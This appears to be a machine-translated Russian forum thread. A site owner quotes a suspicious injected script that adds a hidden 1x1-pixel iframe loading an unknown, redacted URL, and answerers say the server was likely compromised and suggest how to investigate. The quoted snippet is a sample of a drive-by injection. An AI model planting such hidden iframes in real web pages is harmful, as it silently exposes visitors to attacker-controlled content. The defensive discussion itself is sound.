Сегодня я зашел на свой сервер и увидел следующий нераспознанный код в верхней части окна просмотра каталога:
document.writeln (""); var el = document.createElement ("iframe"); document.body.appendChild (el); el.id = 'myname'; el.name = 'myname'; el.style.width = "1px"; el.style.height = "1px"; el.scrolling = "auto"; el.frameBorder = "0"; el.src = "[отредактировано автором, здесь был неизвестный URL]";
Я не узнаю URL (который я отредактировал).
Кроме того, на моей доске объявлений phpBB3 есть несколько сообщений отладки phpBB и уведомлений PHP вверху, которые все для меня в новинку. Более того, некоторые ссылки в коде форума, похоже, были повреждены символами мусора.
Никакого дополнительного контента не было добавлено или удалено, но это вызывает у меня серьезную озабоченность.
Каждая страница на моем сайте защищена запросом на вход в Apache, который, как я думал, был достаточной защитой.
На меня напали, или я прыгаю в тени?
К сожалению, iframe, загружающий содержимое с загадочного URL-адреса, почти наверняка указывает на компромисс.
Чтобы определить уровень нарушения, потребуется очень тщательное расследование экспертом, но такая модификация кода будет означать, что устройство полностью взломано. Что делать дальше, прочтите Вот.
Скорее всего, на вас напали. Попробуйте поискать в Google фрагменты кода. Следующий шаг - определить, внедрили ли они код или это был троян, который раскрыл ваш пароль FTP. Запустите поиск по IP и посмотрите, где находится хакер (если он не скрыт прокси-сервером), в прошлый раз, когда это случилось со мной, оказалось, что я раскрыл свой пароль в интернет-кафе в моем городе, поэтому, прежде чем вы обновите свою безопасность, убедитесь, что он не был взломан из-за ваш локальный компьютер ...